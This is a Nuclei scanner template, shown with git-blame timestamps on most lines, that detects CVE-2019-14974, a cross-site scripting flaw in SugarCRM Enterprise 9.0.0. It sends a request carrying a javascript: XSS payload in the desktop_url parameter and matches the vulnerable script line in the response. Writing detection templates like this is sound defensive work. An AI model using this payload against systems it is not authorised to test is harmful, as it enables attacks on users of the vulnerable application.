2021-01-02 04:59:06 +00:00
|
|
|
id: CVE-2019-14974
|
2020-04-08 12:49:45 +00:00
|
|
|
|
|
|
|
info:
|
|
|
|
name: SugarCRM Enterprise 9.0.0 - Cross-Site Scripting
|
|
|
|
author: madrobot
|
2021-09-10 11:26:40 +00:00
|
|
|
severity: medium
|
2022-09-08 13:28:46 +00:00
|
|
|
description: SugarCRM Enterprise 9.0.0 contains a cross-site scripting vulnerability via mobile/error-not-supported-platform.html?desktop_url.
|
2022-04-22 10:38:41 +00:00
|
|
|
reference:
|
|
|
|
- https://www.exploit-db.com/exploits/47247
|
2022-09-08 13:28:46 +00:00
|
|
|
- https://nvd.nist.gov/vuln/detail/CVE-2019-14974
|
2021-09-10 11:26:40 +00:00
|
|
|
classification:
|
|
|
|
cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
|
2022-04-22 10:38:41 +00:00
|
|
|
cvss-score: 6.1
|
2021-09-10 11:26:40 +00:00
|
|
|
cve-id: CVE-2019-14974
|
|
|
|
cwe-id: CWE-79
|
2022-08-27 04:41:18 +00:00
|
|
|
tags: cve2019,xss,sugarcrm,edb,cve
|
2023-04-28 08:11:21 +00:00
|
|
|
metadata:
|
|
|
|
max-request: 1
|
2020-04-08 12:49:45 +00:00
|
|
|
|
2023-04-27 04:28:59 +00:00
|
|
|
http:
|
2020-04-08 12:49:45 +00:00
|
|
|
- method: GET
|
|
|
|
path:
|
|
|
|
- "{{BaseURL}}/mobile/error-not-supported-platform.html?desktop_url=javascript:alert(1337);//itms://"
|
2020-07-08 11:38:57 +00:00
|
|
|
matchers-condition: and
|
2020-04-08 12:49:45 +00:00
|
|
|
matchers:
|
|
|
|
- type: status
|
|
|
|
status:
|
2020-05-25 07:49:06 +00:00
|
|
|
- 200
|
2020-04-08 13:20:23 +00:00
|
|
|
- type: word
|
2020-04-08 13:24:36 +00:00
|
|
|
words:
|
2020-05-25 07:49:06 +00:00
|
|
|
- "url = window.location.search.split(\"?desktop_url=\")[1]"
|
2020-04-08 12:49:45 +00:00
|
|
|
part: body
|